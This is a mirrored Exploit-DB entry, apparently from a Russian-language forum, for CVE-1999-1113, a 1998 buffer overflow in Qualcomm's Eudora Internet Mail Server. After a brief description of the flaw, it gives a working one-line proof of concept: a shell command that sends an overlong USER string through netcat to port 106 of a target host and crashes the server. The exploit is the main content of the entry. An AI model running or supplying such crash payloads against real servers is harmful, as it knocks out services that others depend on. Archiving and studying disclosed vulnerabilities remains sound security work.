- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19069
- Проверка EDB
-
- Пройдено
- Автор
- NETSTAT WEBMASTER
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-1999-1113
- Дата публикации
- 1998-04-14
Код:
source: https://www.securityfocus.com/bid/75/info
There appears to be a buffer overflow in Qualcomm's Eudora Internet Mail Server. If you connect to its TCP port number 106 and issue the USER command followed by a string over than a thousand bytes in length the server will crash possibly taking down the machine with it.
$ echo USER `perl -e 'print "A"x2048'` | nc target.host.com 106
- Источник
- www.exploit-db.com